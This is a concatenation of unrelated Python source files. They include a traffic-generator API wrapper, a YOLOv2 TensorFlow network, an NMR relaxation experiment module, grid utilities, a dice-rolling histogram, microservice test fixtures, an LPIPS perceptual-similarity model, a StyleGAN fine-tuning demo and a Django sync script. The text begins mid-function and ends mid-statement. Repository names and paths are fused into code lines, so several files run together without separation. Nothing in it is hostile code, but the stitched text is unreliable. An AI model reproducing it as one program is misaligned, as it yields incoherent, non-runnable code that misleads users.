self.filemode: return None self.fix_newstr(kws) return self.execute(self.conn.tg_traffic_config, *args, **kws) def tg_interface_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_interface_config, *args, **kws) def tg_traffic_stats(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_traffic_stats, *args, **kws) def tg_emulation_bgp_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_bgp_config, *args, **kws) def tg_emulation_bgp_route_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_bgp_route_config, *args, **kws) def tg_emulation_bgp_control(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_bgp_control, *args, **kws) def tg_emulation_igmp_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_igmp_config, *args, **kws) def tg_emulation_multicast_group_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_multicast_group_config, *args, **kws) def tg_emulation_multicast_source_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_multicast_source_config, *args, **kws) def tg_emulation_igmp_group_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_igmp_group_config, *args, **kws) def tg_emulation_igmp_control(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_igmp_control, *args, **kws) import tensorflow as tf from util.process_box import compute_IOU from network.ConvBlock import conv2d_bn,bottleneck_block,bottleneck_block_v2 import numpy as np def YoloV2(input_shape,class_num=80,box_num=5): iw, ih, c = input_shape net = tf.Graph() with net.as_default(): x = tf.placeholder(tf.float32, shape=(None, iw, ih, c), name='x') anchors = tf.placeholder(tf.float32, shape=(box_num,2), name='anchors') anchors_reshape = tf.reshape(anchors,(1,1,box_num,2)) conv1 = conv2d_bn(x,32,(3,3),(1,1),padding='same',activation='leaky_relu') pool1 = tf.layers.max_pooling2d(conv1,(2,2),(2,2)) conv2 = conv2d_bn(pool1, 64, (3, 3), (1, 1), padding='same', activation='leaky_relu') pool2 = tf.layers.max_pooling2d(conv2, (2, 2), (2, 2)) conv5 = bottleneck_block(pool2, 128, 64) pool3 = tf.layers.max_pooling2d(conv5, (2, 2), (2, 2)) conv8 = bottleneck_block(pool3, 256, 128) pool4 = tf.layers.max_pooling2d(conv8, (2, 2), (2, 2)) conv13 = bottleneck_block_v2(pool4, 512, 256) pool5 = tf.layers.max_pooling2d(conv13, (2, 2), (2, 2)) conv18 = bottleneck_block_v2(pool5, 1024, 512) conv19 = conv2d_bn(conv18, 1024, (3, 3), (1, 1), padding='same', activation='leaky_relu') conv20 = conv2d_bn(conv19, 1024, (3, 3), (1, 1), padding='same', activation='leaky_relu') conv21 = conv2d_bn(conv13, 64, (1, 1), (1, 1), activation='leaky_relu') conv21_reshaped = tf.space_to_depth(conv21, block_size=2) concat1 = tf.concat([conv21_reshaped,conv20],axis=-1) conv22 = conv2d_bn(concat1, 1024, (3, 3), (1, 1), padding='same', activation='leaky_relu') conv23 = tf.layers.conv2d(conv22, box_num*(5+class_num), (1, 1), (1, 1),activation=None) boxes, confs, probes = predict_layer(conv23, anchors_reshape, class_num, conv23.shape[1], box_num) y = tf.placeholder(tf.float32, shape=(None, int(conv23.shape[1]) ** 2, 5 + class_num), name='y') y_hat = (probes, confs, boxes) net.add_to_collection('input', {'x': x, 'anchors': anchors}) net.add_to_collection('output', {'y_hat': y_hat}) return net def pred_cord_to_box(boxes_pred,size,anchors): """Convert YOLOv2 box predictions to bounding box cords(x,y,w,h).""" ind = np.reshape(np.asarray(range(size ** 2), dtype=np.float32), (1, size ** 2, 1, 1)) boxes_x = (tf.sigmoid(boxes_pred[..., 0:1]) + ind % size) / size boxes_y = (tf.sigmoid(boxes_pred[..., 1:2]) + ind // size) / size boxes_wh = tf.exp(boxes_pred[..., 2:4])*anchors / size boxes_w = boxes_wh[..., :1] boxes_h = boxes_wh[..., 1:2] boxes = tf.concat(( boxes_x, boxes_y, boxes_w, boxes_h ), axis=-1) return boxes def predict_layer(net_out,anchors,num_class,size,box_num): size=int(size) net_out = tf.reshape(net_out,(-1,size**2,box_num,5+num_class)) boxes_pred = net_out[..., :4] boxes = pred_cord_to_box(boxes_pred,size,anchors) box_confidence = tf.sigmoid(net_out[..., 4:5]) box_class_probs = tf.nn.softmax(net_out[..., 5:]) return boxes,box_confidence,box_class_probs def compute_loss(y_true,y_hat,lambd_coord=5,lambd_nonObj=.5): probes_hat, confs_hat, boxes_cord_hat = y_hat obj_mask = y_true[..., 0] confs_true = tf.expand_dims(obj_mask,axis=2) boxes_cord_true = tf.expand_dims(y_true[...,1:5],axis=2) probes_true = y_true[...,5:] IOU = compute_IOU(boxes_cord_true,boxes_cord_hat) IOU_max = tf.reshape(tf.reduce_max(confs_hat,axis=-1),(-1,confs_hat.shape[1],1)) box_mask = tf.cast(IOU >= IOU_max, dtype=tf.float32) * tf.reshape(obj_mask, (-1, confs_hat.shape[1], 1)) location_loss = tf.reduce_sum(tf.reduce_sum(box_mask*tf.reduce_sum(tf.pow(boxes_cord_hat-boxes_cord_true,2),axis=-1),axis=-1),axis=-1) conf_diff_sum_obj = tf.reduce_sum(box_mask*tf.pow(confs_hat - confs_true,2),axis=-1) conf_loss_obj = tf.reduce_sum(tf.reduce_sum(conf_diff_sum_obj,axis=-1),axis=-1) conf_diff_sum_nonObj = tf.reduce_sum((1-box_mask) * tf.pow(confs_hat - confs_true, 2), axis=-1) conf_loss_nonObj = tf.reduce_sum(tf.reduce_sum(conf_diff_sum_nonObj,axis=-1),axis=-1) class_loss = tf.reduce_sum(obj_mask*tf.reduce_sum(tf.pow(probes_hat-probes_true,2),axis=-1),axis=-1) loss = tf.reduce_mean(lambd_coord*location_loss+conf_loss_obj+lambd_nonObj*conf_loss_nonObj+class_loss) return loss if __name__ == '__main__': YoloV2((224,224,3)) src/nlp/entities.py import hunlp import pandas as pd import plac from tqdm import tqdm def extract_entities(texts): nlp = hunlp.HuNlp() entities = [list(nlp(text).entities) if type(text) == str else [] for text in tqdm(texts)] return entities def main(merged_tsv, entities_tsv): df = pd.read_csv(merged_tsv, sep="\t").set_index("Hash") df["Entities"] = extract_entities(df.Text.values) df[["Entities"]].to_csv(entities_tsv) if __name__ == '__main__': plac.call(main) from __future__ import annotations from dataclasses import dataclass from typing import Literal import numpy as np from numpy.typing import NDArray from chemex.configuration.data import RelaxationDataSettings from chemex.configuration.experiment import ExperimentConfig from chemex.configuration.experiment import RelaxationSettings from chemex.configuration.experiment import ToBeFitted from chemex.containers.data import Data from chemex.containers.dataset import load_relaxation_dataset from chemex.experiments.configurations import configurations from chemex.experiments.descriptions import descriptions from chemex.experiments.factories import Creators from chemex.experiments.factories import factories from chemex.filterers import PlanesFilterer from chemex.nmr.liouvillian import Basis from chemex.nmr.liouvillian import LiouvillianIS from chemex.nmr.spectrometer import Spectrometer from chemex.parameters.spin_system import SpinSystem from chemex.plotters import RelaxationPlotter from chemex.printers.data import RelaxationPrinter # Type definitions NDArrayFloat = NDArray[np.float_] NDArrayBool = NDArray[np.bool_] EXPERIMENT_NAME = "relaxation_hznz" class RelaxationHzNzSettings(RelaxationSettings): name: Literal["relaxation_hznz"] observed_state: Literal["a", "b", "c", "d"] = "a" @property def detection(self) -> str: return f"[2izsz_{self.observed_state}]" class RelaxationHzNzConfig( ExperimentConfig[RelaxationHzNzSettings, RelaxationDataSettings] ): @property def to_be_fitted(self) -> ToBeFitted: state = self.experiment.observed_state return ToBeFitted( rates=[f"r1a_is_{state}"], model_free=[f"tauc_{state}", f"s2_{state}", f"khh_{state}"], ) def build_spectrometer( config: RelaxationHzNzConfig, spin_system: SpinSystem ) -> Spectrometer: settings = config.experiment conditions = config.conditions basis = Basis(type="izsz", spin_system="nh") liouvillian = LiouvillianIS(spin_system, basis, conditions) spectrometer = Spectrometer(liouvillian) spectrometer.detection = settings.detection return spectrometer @dataclass class RelaxationHzNzSequence: settings: RelaxationHzNzSettings def calculate(self, spectrometer: Spectrometer, data: Data) -> np.ndarray: times = data.metadata # Getting the starting magnetization start = spectrometer.get_start_magnetization(["2izsz"]) # Return profile delays = spectrometer.delays(0.25 * np.array(times)) p180_i = spectrometer.perfect180_i[0] p180_s = spectrometer.perfect180_s[0] return np.array( [ spectrometer.detect( delay @ p180_s @ delay @ p180_i @ delay @ p180_s @ delay @ start ) for delay in delays ] ) def is_reference(self, metadata: NDArrayFloat) -> NDArrayBool: return np.full_like(metadata, False, dtype=np.bool_) def register(): creators = Creators( config_creator=RelaxationHzNzConfig, spectrometer_creator=build_spectrometer, sequence_creator=RelaxationHzNzSequence, dataset_creator=load_relaxation_dataset, filterer_creator=PlanesFilterer, printer_creator=RelaxationPrinter, plotter_creator=RelaxationPlotter, ) factories.register(type=EXPERIMENT_NAME, creators=creators) descriptions.register(EXPERIMENT_NAME, __package__, "description.md") configurations.register(EXPERIMENT_NAME, __package__, "config.toml") import numpy as np from pymt.grids.assertions import is_rectilinear, is_structured, is_unstructured def get_default_coordinate_units(n_dims): if n_dims <= 0 or n_dims > 3: raise ValueError("dimension must be between one and three") return ["-"] * n_dims def get_default_coordinate_names(n_dims): if n_dims <= 0 or n_dims > 3: raise ValueError("dimension must be between one and three") return ["z", "y", "x"][-n_dims:] def assert_arrays_are_equal_size(*args): first_size = args[0].size for arg in args[1:]: if arg.size != first_size: raise AssertionError("arrays are not the same length") def args_as_numpy_arrays(*args): np_arrays = [] for arg in args: if isinstance(arg, np.ndarray): np_array = arg.view() else: np_array = np.array(arg) np_array.shape = (np_array.size,) np_arrays.append(np_array) return tuple(np_arrays) def coordinates_to_numpy_matrix(*args): args = args_as_numpy_arrays(*args) assert_arrays_are_equal_size(*args) coords = np.empty((len(args), len(args[0])), dtype=np.float) for (dim, arg) in enumerate(args): coords[dim][:] = arg.flatten() return coords def non_singleton_axes(grid): try: shape = grid.get_shape() except AttributeError: return np.arange(grid.get_dim_count()) else: (indices,) = np.where(shape > 1) return indices def non_singleton_shape(grid): shape = grid.get_shape() (indices,) = np.where(shape > 1) return shape[indices] def non_singleton_coordinate_names(grid): indices = non_singleton_axes(grid) return grid.get_coordinate_name(indices) def non_singleton_dimension_names(grid): if is_structured(grid, strict=False): coordinate_names = non_singleton_coordinate_names(grid) # return np.array(['n' + name for name in coordinate_names]) return coordinate_names else: return np.array(["n_node"]) def non_singleton_dimension_shape(grid): if is_rectilinear(grid, strict=False): shape = non_singleton_dimension_names(grid) return shape[:, np.newaxis] elif is_structured(grid, strict=True): shape = non_singleton_dimension_names(grid) return np.tile(shape, (len(shape), 1)) elif is_unstructured(grid, strict=True): shape = np.array(["n_node"]) return np.tile(shape, (grid.get_dim_count(), 1)) def _find_first(array, value): try: return np.where(array == value)[0][0] except IndexError: return len(array) def connectivity_matrix_as_array(face_nodes, bad_val): nodes_per_face = np.empty(face_nodes.shape[0], dtype=np.int) for (face_id, face) in enumerate(face_nodes): nnodes = _find_first(face, bad_val) if nnodes > 0: nodes_per_face[face_id] = _find_first(face, bad_val) else: raise ValueError("face contains no nodes") offsets = np.cumsum(nodes_per_face) connectivity = np.empty(offsets[-1], dtype=int) offset = 0 for (n_nodes, face) in zip(nodes_per_face, face_nodes): connectivity[offset : offset + n_nodes] = face[:n_nodes] offset += n_nodes return (connectivity, offsets) Rolling Dice/different_dice.py1-10 import pygal from die import Die # Create a D6 and D10 die_1 = Die() die_2 = Die(10) # Make a some roles, and store results in list results = [] for roll_num in range(50000): result = die_1.roll() + die_2.roll() results.append(result) # Analyze the results frequencies = [] max_result = die_1.num_sides + die_2.num_sides for value in range(2, max_result+1): frequency = results.count(value) frequencies.append(frequency) # Visualize the results. hist = pygal.Bar() hist.title = "Results of rolling a D6 and a D10 50,000 times" hist.x_labels = [str(value) for value in range(2, 17)] hist.x_title = "Result" hist.y_title = "Frequency of Result" hist.add('D5 + D10', frequencies) hist.render_to_file('different_dice.svg') microservice/tests/microservices_for_testing.py import sys from microservice.core.decorator import microservice echo_as_dict2_args = (5, 2, 5) echo_as_dict2_kwargs = {'asdf': "asdrf"} @microservice def echo_as_dict(*args, **kwargs): ret = {'_args': args} ret.update(kwargs) return ret @microservice def echo_as_dict2(*args, **kwargs): ret = {'_args': args} ret.update(kwargs) print("Calling into `echo_as_dict`") ret2 = echo_as_dict(*echo_as_dict2_args, **echo_as_dict2_kwargs) return ret, ret2 @microservice def echo_as_dict3(*args, **kwargs): ret = {'_args': args} ret.update(kwargs) ret2 = echo_as_dict2(234, 456, 345, ty="no problem") return ret, ret2 @microservice def echo_as_dict4(*args, **kwargs): ret = {'_args': args} ret.update(kwargs) ret2 = echo_as_dict3(234, 456, 345, ty="no problem") return ret, ret2 @microservice def echo_as_dict5(*args, **kwargs): ret = {'_args': args} ret.update(kwargs) ret2 = echo_as_dict2(234, 456, 345, ty="no problem") ret3 = echo_as_dict3(234, 456, 345, ty="no problem") return ret, ret2, ret3 @microservice def exception_raiser(*args, **kwargs): raise RuntimeError("Called with: {}; {}".format(args, kwargs)) all_test_microservices = [ 'microservice.tests.microservices_for_testing.echo_as_dict', 'microservice.tests.microservices_for_testing.echo_as_dict2', 'microservice.tests.microservices_for_testing.echo_as_dict3', 'microservice.tests.microservices_for_testing.echo_as_dict4', 'microservice.tests.microservices_for_testing.echo_as_dict5', 'microservice.tests.microservices_for_testing.exception_raiser', ] jabba/file_data.py import collections FileData = collections.namedtuple('FileData', ['path', 'yaml']) marcoalsina/araucaria1-10 #!/usr/bin/python # -*- coding: utf-8 -*- """ The :mod:`~araucaria.xas` module contains the main functions to manipulate XAFS spectra. The following submodules are currently implemented: - The :mod:`~araucaria.xas.merge` module contains functions to pre-process and merge spectra. - The :mod:`~araucaria.xas.deglitch` module contains an algorithm to automatically deglitch a spectrum. - The :mod:`~araucaria.xas.normalize` module contains functions to normalize a spectrum. - The :mod:`~araucaria.xas.autobk` module contains the Autobk algorithm for background removal of a spectrum. - The :mod:`~araucaria.xas.xasft` module contains functions to perform Fourier transforms on a spectrum. - The :mod:`~araucaria.xas.xasutils` module contains utility functions to assist manipulation of spectra. """ from .merge import calibrate, align, merge from .deglitch import deglitch from .normalize import find_e0, guess_edge, pre_edge from .autobk import autobk from .xasft import ftwindow, xftf, xftr, xftf_kwin, xftr_kwin from .xasutils import etok, ktoe, get_mapped_data from api.serializers.feed import CommentSerializer, ReplySerializer from api.serializers.users import UserSerializer from rest_framework import fields from rest_framework.serializers import Serializer from likes.models import Like class LikeSerializer(Serializer): user = UserSerializer() conversation = CommentSerializer() Nollde/order # coding: utf-8 __all__ = ["ProcessTest"] from io import BytesIO import unittest from order import Process from scinum import Number class ProcessTest(unittest.TestCase): def test_constructor(self): p = Process("ttH", 1, xsecs={ 13: Number(0.5071, {"scale": (Number.REL, 0.036)}), }, label=r"$t\bar{t}H$", color=(255, 0, 0), ) self.assertEqual(p.get_xsec(13).n, 0.5071) self.assertEqual(p.label_root, "t#bar{t}H") with self.assertRaises(TypeError): Process("ttH_bb", 2, xsecs="nodict") with self.assertRaises(TypeError): Process("ttH_cc", 3, xsecs={13: ""}) def test_child_processes(self): p = Process("tt", 4) p5 = p.add_process("tt_bb", 5) self.assertEqual(p.get_process(5), p5) self.assertEqual(p5.get_parent_process(4), p) def test_attributes(self): p = Process("ST", 6, xsecs={13: 5}) self.assertEqual(p.get_xsec(13).n, 5.) p.set_xsec(13, 6) self.assertEqual(p.get_xsec(13).n, 6.) p.xsecs = {14: 7} self.assertNotIn(13, p.xsecs) self.assertEqual(p.get_xsec(14).n, 7.) def test_copy(self): p = Process("ttVV", 7, xsecs={13: 5}, color=(0.3, 0.4, 0.5), is_data=False, aux={1: 2}) p2 = p.copy(name="ttVVV", id=8, aux={3: 4}) self.assertEqual(p2.name, "ttVVV") self.assertEqual(p2.id, 8) self.assertEqual(p2.get_xsec(13), 5) self.assertEqual(p2.color, p.color) self.assertEqual(list(p2.aux.keys())[0], 3) def test_parent_processes(self): c = Process("child", 10) p1 = Process("parent1", 11) p1.add_process(c) self.assertIn(p1, c.parent_processes) p2 = Process("parent2", 12, processes=[c]) self.assertIn(p2, c.parent_processes) def test_pretty_print(self): a = Process("a", 100, xsecs={13: 12}) a.add_process("b", 101, xsecs={13: 1}) output = BytesIO() a.pretty_print(13, offset=10, stream=output) self.assertEqual(output.getvalue().decode("utf-8"), "> a (100) 12.0 (no uncertainties)\n| > b (101) 1.0 (no uncertainties)\n") """ Code adapted from https://github.com/richzhang/PerceptualSimilarity Original License: Copyright (c) 2018, , , , , All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ import torch from torch import nn import torchvision class LPIPS_VGG16(nn.Module): _FEATURE_IDX = [0, 4, 9, 16, 23, 30] _LINEAR_WEIGHTS_URL = 'https://github.com/richzhang/PerceptualSimilarity' + \ '/blob/master/models/weights/v0.1/vgg.pth?raw=true' def __init__(self, pixel_min=-1, pixel_max=1): super(LPIPS_VGG16, self).__init__() features = torchvision.models.vgg16(pretrained=True).features self.slices = nn.ModuleList() linear_weights = torch.utils.model_zoo.load_url(self._LINEAR_WEIGHTS_URL) for i in range(1, len(self._FEATURE_IDX)): idx_range = range(self._FEATURE_IDX[i - 1], self._FEATURE_IDX[i]) self.slices.append(nn.Sequential(*[features[j] for j in idx_range])) self.linear_layers = nn.ModuleList() for weight in torch.utils.model_zoo.load_url(self._LINEAR_WEIGHTS_URL).values(): weight = weight.view(1, -1) linear = nn.Linear(weight.size(1), 1, bias=False) linear.weight.data.copy_(weight) self.linear_layers.append(linear) self.register_buffer('shift', torch.Tensor([-.030, -.088, -.188]).view(1, -1, 1, 1)) self.register_buffer('scale', torch.Tensor([.458, .448, .450]).view(1, -1, 1, 1)) self.pixel_min = pixel_min self.pixel_max = pixel_max self.requires_grad_(False) self.eval() def _scale(self, x): if self.pixel_min != -1 or self.pixel_max != 1: x = (2 * x - self.pixel_min - self.pixel_max) \ / (self.pixel_max - self.pixel_min) return (x - self.shift) / self.scale @staticmethod def _normalize_tensor(feature_maps, eps=1e-8): rnorm = torch.rsqrt(torch.sum(feature_maps ** 2, dim=1, keepdim=True) + eps) return feature_maps * rnorm def forward(self, x0, x1, eps=1e-8): x0, x1 = self._scale(x0), self._scale(x1) dist = 0 for slice, linear in zip(self.slices, self.linear_layers): x0, x1 = slice(x0), slice(x1) _x0, _x1 = self._normalize_tensor(x0, eps), self._normalize_tensor(x1, eps) dist += linear(torch.mean((_x0 - _x1) ** 2, dim=[-1, -2])) return dist.view(-1) from .config import set_config from .get import get from .login import login from .logout import logout from .next import next from .pause import pause from .play import play from .prev import prev from .set import set from .status import status from .volume import volume __all__ = [ "set_config", "get", "login", "logout", "next", "pause", "play", "prev", "set", "status", "volume", ] import torch torch.backends.cudnn.benchmark = True from torchvision import transforms, utils from util import * from PIL import Image import math import random import os import numpy as np from torch import nn, autograd, optim from torch.nn import functional as F from torchvision.utils import save_image from tqdm import tqdm import lpips import wandb from model import * from e4e_projection import projection as e4e_projection import subprocess from copy import deepcopy import argparse import glob os.makedirs('style_images', exist_ok=True) os.makedirs('style_images_aligned', exist_ok=True) os.makedirs('models', exist_ok=True) os.makedirs('test_output', exist_ok=True) os.makedirs('train_aligned', exist_ok=True) os.makedirs('train_inversion', exist_ok=True) os.makedirs('train_style_images', exist_ok=True) drive_ids = { "stylegan2-ffhq-config-f.pt": "1Yr7KuD959btpmcKGAUsbAk5rPjX2MytK", "e4e_ffhq_encode.pt": "1o6ijA3PkcewZvwJJ73dJ0fxhndn0nnh7", "restyle_psp_ffhq_encode.pt": "1nbxCIVw9H3YnQsoIPykNEFwWJnHVHlVd", "arcane_caitlyn.pt": "1gOsDTiTPcENiFOrhmkkxJcTURykW1dRc", "arcane_caitlyn_preserve_color.pt": "1cUTyjU-q98P75a8THCaO545RTwpVV-aH", "arcane_jinx_preserve_color.pt": "1jElwHxaYPod5Itdy18izJk49K1nl4ney", "arcane_jinx.pt": "1quQ8vPjYpUiXM4k1_KIwP4EccOefPpG_", "arcane_multi_preserve_color.pt": "1enJgrC08NpWpx2XGBmLt1laimjpGCyfl", "arcane_multi.pt": "15V9s09sgaw-zhKp116VHigf5FowAy43f", "disney.pt": "1zbE2upakFUAx8ximYnLofFwfT8MilqJA", "disney_preserve_color.pt": "1Bnh02DjfvN_Wm8c4JdOiNV4q9J7Z_tsi", "jojo.pt": "13cR2xjIBj8Ga5jMO7gtxzIJj2PDsBYK4", "jojo_preserve_color.pt": "1ZRwYLRytCEKi__eT2Zxv1IlV6BGVQ_K2", "jojo_yasuho.pt": "1grZT3Gz1DLzFoJchAmoj3LoM9ew9ROX_", "jojo_yasuho_preserve_color.pt": "1SKBu1h0iRNyeKBnya_3BBmLr4pkPeg_L", "supergirl.pt": "1L0y9IYgzLNzB-33xTpXpecsKU-t9DpVC", "supergirl_preserve_color.pt": "1VmKGuvThWHym7YuayXxjv0fSn32lfDpE", "art.pt": "1a0QDEHwXQ6hE_FcYEyNMuv5r5UnRQLKT", } # モデルダウンロード for key in drive_ids: file_id = drive_ids[key] dst_path = './models/' + key if not os.path.exists(dst_path): res = subprocess.call(['gdown', '--id', file_id, '-O', dst_path]) print('Model download completed') device = 'cuda' if torch.cuda.is_available() else 'cpu' latent_dim = 512 print('The device used for torch is', device) transform = transforms.Compose( [ transforms.Resize((1024, 1024)), transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)), ] ) def get_args(): parser = argparse.ArgumentParser() # スタイルの適用に利用する画像を指定 parser.add_argument("--img_path", type=str, default='./test_input/sample_input.jpg') # 事前学習済みモデルを選択(art, arcane_multi, supergirl, arcane_jinx, arcane_caitlyn, jojo_yasuho, jojo, disney) parser.add_argument("--pretrained", type=str, default='arcane_multi', help='please select art, arcane_multi, supergirl, arcane_jinx, arcane_caitlyn, jojo_yasuho, jojo, disney') # 事前学習済みモデル、及び、学習時にStyleの色を適用する場合はTrue parser.add_argument("--preserve_color", type=bool, default=True) # ランダムにサンプルにスタイルを適用。サンプルを指定 parser.add_argument("--n_sample", type=int, default=5) # seed parser.add_argument("--seed", type=int, default=1234) # 学習時に使用するstyleのディレクトリを指定 parser.add_argument("--img_dir", type=str, default='./train_style_images/') # 学習時のiteration parser.add_argument("--num_iter", type=int, default=200) args = parser.parse_args() return (args) def main(): # generatorのロード original_generator = Generator(1024, latent_dim, 8, 2).to(device) ckpt = torch.load('models/stylegan2-ffhq-config-f.pt', map_location=lambda storage, loc: storage) original_generator.load_state_dict(ckpt["g_ema"], strict=False) mean_latent = original_generator.mean_latent(10000) # finetune generatorのロード generator = deepcopy(original_generator) args = get_args() filepath = args.img_path name = strip_path_extension(filepath)+'.pt' # 顔部分をcrop aligned_face = align_face(filepath) my_w = e4e_projection(aligned_face, name, device).unsqueeze(0) aligned_face.save('./test_output/Aligned_face.jpg') # pretrain styleをロード pretrained = args.pretrained preserve_color = args.preserve_color if preserve_color: ckpt = f'{pretrained}_preserve_color.pt' else: ckpt = f'{pretrained}.pt' # モデルロード ckpt = torch.load(os.path.join('models', ckpt), map_location=lambda storage, loc: storage) generator.load_state_dict(ckpt["g"], strict=False) n_sample = args.n_sample seed = args.seed # Style適用 torch.manual_seed(seed) with torch.no_grad(): generator.eval() z = torch.randn(n_sample, latent_dim, device=device) original_sample = original_generator([z], truncation=0.7, truncation_latent=mean_latent) sample = generator([z], truncation=0.7, truncation_latent=mean_latent) original_my_sample = original_generator(my_w, input_is_latent=True) my_sample = generator(my_w, input_is_latent=True) # 生成結果保存 if pretrained == 'arcane_multi': style_path = f'style_images_aligned/arcane_jinx.png' else: style_path = f'style_images_aligned/{pretrained}.png' style_image = transform(Image.open(style_path)).unsqueeze(0).to(device) face = transform(aligned_face).unsqueeze(0).to(device) my_output = torch.cat([style_image, face, my_sample], 0) save_image( utils.make_grid(my_output, normalize=True, range=(-1, 1)), './test_output/sample_output.png' ) output = torch.cat([original_sample, sample], 0) save_image( utils.make_grid(output, normalize=True, range=(-1, 1), nrow=n_sample), './test_output/random_sample_output.png' ) ################################################################################### # train ################################################################################### folderpath = args.img_dir images = glob.glob( os.path.join(folderpath, '*.*') ) targets = [] latents = [] for image in images: style_path = image name = strip_path_extension(os.path.basename(image)) # crop and align the face style_aligned_path = os.path.join('train_aligned', os.path.basename(image)) if not os.path.exists(style_aligned_path): style_aligned = align_face(style_path) style_aligned.save(style_aligned_path) else: style_aligned = Image.open(style_aligned_path).convert('RGB') # GAN invert style_code_path = os.path.join('train_inversion', f'{name}.pt') if not os.path.exists(style_code_path): latent = e4e_projection(style_aligned, style_code_path, device) else: latent = torch.load(style_code_path)['latent'] targets.append(transform(style_aligned).to(device)) latents.append(latent.to(device)) targets = torch.stack(targets, 0) latents = torch.stack(latents, 0) target_im = utils.make_grid(targets, normalize=True, range=(-1, 1)) alpha = 1.0 #@param {type:"slider", min:0, max:1, step:0.1} alpha = 1-alpha preserve_color = args.preserve_color num_iter = args.num_iter lpips_fn = lpips.LPIPS(net='vgg').to(device) # reset generator del generator generator = deepcopy(original_generator) g_optim = optim.Adam(generator.parameters(), lr=2e-3, betas=(0, 0.99)) # Which layers to swap for generating a family of plausible real images -> fake image if preserve_color: id_swap = [7,9,11,15,16,17] else: id_swap = list(range(7, generator.n_latent)) for idx in tqdm(range(num_iter)): if preserve_color: random_alpha = 0 else: random_alpha = np.random.uniform(alpha, 1) mean_w = generator.get_latent(torch.randn([latents.size(0), latent_dim]).to(device)).unsqueeze(1).repeat(1, generator.n_latent, 1) in_latent = latents.clone() in_latent[:, id_swap] = alpha*latents[:, id_swap] + (1-alpha)*mean_w[:, id_swap] img = generator(in_latent, input_is_latent=True) loss = lpips_fn(F.interpolate(img, size=(256,256), mode='area'), F.interpolate(targets, size=(256,256), mode='area')).mean() g_optim.zero_grad() loss.backward() g_optim.step() torch.manual_seed(seed) with torch.no_grad(): generator.eval() z = torch.randn(n_sample, latent_dim, device=device) original_sample = original_generator([z], truncation=0.7, truncation_latent=mean_latent) sample = generator([z], truncation=0.7, truncation_latent=mean_latent) original_my_sample = original_generator(my_w, input_is_latent=True) my_sample = generator(my_w, input_is_latent=True) # display reference images style_images = [] for image in images: name = os.path.basename(image) #style_path = f'train_aligned/{strip_path_extension(name)}.png' style_path = os.path.join('train_aligned', name) style_image = transform(Image.open(style_path)) style_images.append(style_image) face = transform(aligned_face).to(device).unsqueeze(0) style_images = torch.stack(style_images, 0).to(device) save_image( utils.make_grid(style_images, normalize=True, range=(-1, 1)), './train_aligned/trained_references.png' ) my_output = torch.cat([face, my_sample], 0) save_image( utils.make_grid(my_output, normalize=True, range=(-1, 1)), './train_aligned/trained_sample.png' ) output = torch.cat([original_sample, sample], 0) save_image( utils.make_grid(output, normalize=True, range=(-1, 1), nrow=n_sample), './train_aligned/trained_random_sample.png' ) # python3 demo.py \ # --img_path ./test_input/sample_input.jpg \ # --pretrained jojo \ # --preserve_color True \ # --n_sample 5 \ # --seed 1234 \ # --img_dir ./style_images/ if __name__ == '__main__': main()kzailac/poem import os import django os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Poem.settings') django.setup() import requests import logging from Poem import settings from Poem.poem import models from Poem.tenants.models import Tenant from xml.etree import ElementTree from tenant_schemas.utils import schema_context, get_public_schema_name from configparser import ConfigParser logging.basicConfig(format='%(filename)s[%(process)s]: %(levelname)s %(message)s', level=logging.INFO) logger = logging.getLogger("POEM") def tenant_vo_url(tenant): config = ConfigParser() config.read(settings.CONFIG_FILE) return config.get('SYNC_' + tenant.upper(), 'vo') def main(): "Parses VO list provided by CIC portal" schemas = list(Tenant.objects.all().values_list('schema_name', flat=True)) schemas.remove(get_public_schema_name()) for schema in schemas: with schema_context(schema): tenant = Tenant.objects.get(schema_name=schema) try: ret = requests.get(tenant_vo_url(tenant.name), timeout=60).content except Exception as e: logger.error('%s: VO card - '+'%s' % (schema.upper(), e)) continue try: Root = ElementTree.XML(ret) idcards = Root.findall("IDCard") except Exception as e: logger.error('%s: Could not parse VO card - %s' % ( schema.upper(), e)) continue if len(idcards) > 0: vos = [] for vo_element in idcards: dict_vo_element = dict(vo_element.items()) if 'Name' not in dict_vo_element or 'Status' not in dict_vo_element: logger.warning("%s: vo card does not contain 'Name' " "and 'Status' attributes for %s" % (schema.upper(), vo_element)) else: if 